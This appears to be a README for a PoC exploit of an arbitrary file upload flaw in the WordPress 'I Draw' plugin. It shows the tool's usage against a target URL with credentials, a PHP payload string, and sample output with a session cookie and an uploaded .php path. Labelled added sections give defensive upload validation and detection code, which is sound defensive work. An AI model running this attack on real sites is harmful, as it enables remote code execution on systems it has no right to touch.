WordPress I Draw Plugin <= 1.0 is vulnerable to Arbitrary File Upload

# 🚨 WordPress Plugin Exploit: CVE-2025-39436
## 📝 Description
An **Unrestricted Upload of File with Dangerous Type** vulnerability exists in the "I Draw" WordPress plugin: its upload handler does not check the type of file it stores, so a logged-in user (the script takes a username and password) can upload files of any type, including PHP. The issue affects **I Draw versions up to 1.0**.
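The vulnerability class named above is the absence of type checking on upload. The following is an added example, not code from the I Draw plugin or from this PoC, showing the allow-list validation an upload handler needs: a fixed set of permitted extensions, rejection of any executable token anywhere in the extension chain (so `avatar.php.png` is refused as well), a magic-byte check that the content matches the claimed type, and a server-chosen storage name. All function and constant names and the sample inputs are this example's own.

```python
"""Added example, not code from the I Draw plugin or from the PoC: the allow-list
style of upload validation that closes an Unrestricted Upload of File with
Dangerous Type. Function and constant names are this example's own."""
from __future__ import annotations
import os
import secrets

# Store only what the feature needs; an allow-list, never a deny-list of bad types.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}

# Tokens that must not appear anywhere in the extension chain, so that a name like
# "avatar.php.png" is rejected too (some server configurations execute it as PHP).
EXECUTABLE_TOKENS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps", "htaccess"}

# Leading bytes each allowed type must start with; the content has to match the extension.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def validate_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, message). On acceptance the message is the server-chosen
    name to store the file under; the client-supplied name is never reused."""
    base = os.path.basename(filename)
    if not base or base != filename or "\x00" in base:
        return False, "rejected: empty name, path component or null byte"
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[-1]:
        return False, "rejected: missing extension"
    chain = parts[1:]
    if any(token in EXECUTABLE_TOKENS for token in chain):
        return False, f"rejected: executable extension in {base!r}"
    ext = chain[-1]
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"rejected: {ext!r} is not an allowed type"
    if not data.startswith(MAGIC[ext]):
        return False, f"rejected: content is not a {ext} file"
    # Random server-side name: no attacker-controlled characters reach the filesystem.
    return True, f"{secrets.token_hex(8)}.{ext}"


if __name__ == "__main__":
    # Constructed sample inputs: one real PNG header, the rest should all be refused.
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    for name, data in [("photo.png", png), ("nxploit.php", b"<?php echo 1; ?>"),
                       ("avatar.php.png", png), ("photo.png", b"<?php echo 1; ?>")]:
        print(name, validate_upload(name, data))
```

The validation belongs in the plugin's upload handler; as a second layer, the web server should be configured not to execute PHP from the uploads tree at all, so that a validation bypass does not turn into code execution.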
---
## 🛠️ Exploit Details
The script uses the plugin's upload handler to place a PHP file under `wp-content/uploads`, where the web server executes it on request. The default payload is a harmless marker, defined as a Python string inside the script:

```python
# Default payload written into the uploaded file: a plain echo that prints a marker string
php_code = "<?php echo 'Im Nxploited | Khaled Alenazi'; ?>"
```
---
## 🚀 Usage
```bash
usage: CVE-2025-39436.py [-h] -u URL -un USERNAME -p PASSWORD

options:
  -h, --help            Show this help message and exit
  -u, --url URL         Target website URL
  -un, --username USERNAME
                        Username
  -p, --password PASSWORD
```
---
## 💻 Script Output Example
```plaintext
[✅] Login successful.
[🍪] Cookies here:
wordpress_logged_in_4b00801d41db6e7d9e0ed0af2c824ea0=admin%7C1746301986%7CZvXtaLwW7AlgtJ9JxOH24nAo8G6WqoSQGYcz6xGSNe1%7C53cc2f686eb1e4265e17fcb0823d5e7349ffdc7b86ec8099453b5e80e7c2b51a
[✅] File uploaded successfully:
[🔗] http://target/wp-content/uploads/2025/4/19/nxploit.php
```
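The output above shows the artifact a successful run leaves behind: a `.php` file under `wp-content/uploads`, reachable and executable over HTTP. The following is an added example, not part of the PoC, with two defender-side checks for that artifact: a sweep of upload paths for PHP-executable extensions (and for `.htaccess` files, which can re-enable PHP execution in that tree), and a pass over web server access-log lines for successful requests to `.php` paths under `/wp-content/uploads/`. The sample paths and log lines are constructed; the `walk_uploads` helper is for use against a real uploads directory.

```python
"""Added example, not part of the PoC: defender-side checks for the artifact the
exploit leaves behind (a PHP file under wp-content/uploads). Sample paths and
log lines below are constructed."""
from __future__ import annotations
import os
import re
from typing import Iterable

# Extension tokens that PHP-capable web servers will execute.
EXECUTABLE_TOKENS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps"}


def suspicious_upload_paths(paths: Iterable[str]) -> list[str]:
    """Return upload paths whose extension chain contains an executable token
    (so 'avatar.php.jpg' is flagged too), plus any .htaccess file in the tree."""
    hits = []
    for p in paths:
        name = os.path.basename(p).lower()
        tokens = name.split(".")[1:]
        if name == ".htaccess" or any(t in EXECUTABLE_TOKENS for t in tokens):
            hits.append(p)
    return hits


def walk_uploads(uploads_dir: str) -> list[str]:
    """Collect every file path under a real uploads directory for the sweep above."""
    found = []
    for root, _dirs, files in os.walk(uploads_dir):
        for f in files:
            found.append(os.path.join(root, f))
    return found


# Combined/common log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def php_hits_in_uploads(log_lines: Iterable[str]) -> list[dict]:
    """Flag requests to a .php path under /wp-content/uploads/ that got a 2xx.
    A 2xx there means the server served or executed PHP from the uploads tree,
    which it should never do."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0].lower()
        ext = path.rsplit(".", 1)[-1]
        if "/wp-content/uploads/" in path and ext in EXECUTABLE_TOKENS and m.group("status").startswith("2"):
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"), "path": path, "status": m.group("status")})
    return hits


# Constructed sample data (not real site data).
SAMPLE_PATHS = [
    "wp-content/uploads/2025/04/photo.png",
    "wp-content/uploads/2025/4/19/nxploit.php",
    "wp-content/uploads/2025/04/avatar.php.jpg",
    "wp-content/uploads/.htaccess",
]
SAMPLE_LOG = [
    '203.0.113.5 - - [19/Apr/2025:10:00:01 +0000] "GET /wp-content/uploads/2025/04/photo.png HTTP/1.1" 200 5120',
    '203.0.113.5 - - [19/Apr/2025:10:00:09 +0000] "GET /wp-content/uploads/2025/4/19/nxploit.php HTTP/1.1" 200 41',
    '198.51.100.7 - - [19/Apr/2025:10:01:00 +0000] "GET /wp-content/uploads/2025/4/19/old.php HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for p in suspicious_upload_paths(SAMPLE_PATHS):
        print("suspicious file:", p)
    for h in php_hits_in_uploads(SAMPLE_LOG):
        print("served PHP from uploads:", h)
```

Run the sweep with `suspicious_upload_paths(walk_uploads("/var/www/html/wp-content/uploads"))` on a live site (path assumed); any hit is worth treating as an incident indicator, since WordPress itself never writes PHP into that tree. The 404 line in the sample is deliberately not flagged: a failed request is still useful for hunting, but it is not evidence that PHP executed.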
---
## ⚠️ Disclaimer
This script is provided for **educational purposes only**. The author takes no responsibility for any misuse or damage caused by this exploit. Use it at your own risk.
---
*By: Nxploited ( Khaled Alenazi )*
---
## 📂 Files
```plaintext
[4.0K]  /data/pocs/7f16eda47cd884489fbf69196bce6110989e961e
├── [1.9K]  CVE-2025-39436.py
├── [1.1K]  LICENSE
├── [1.4K]  README.md
└── [   9]  requirements.txt

0 directories, 4 files
```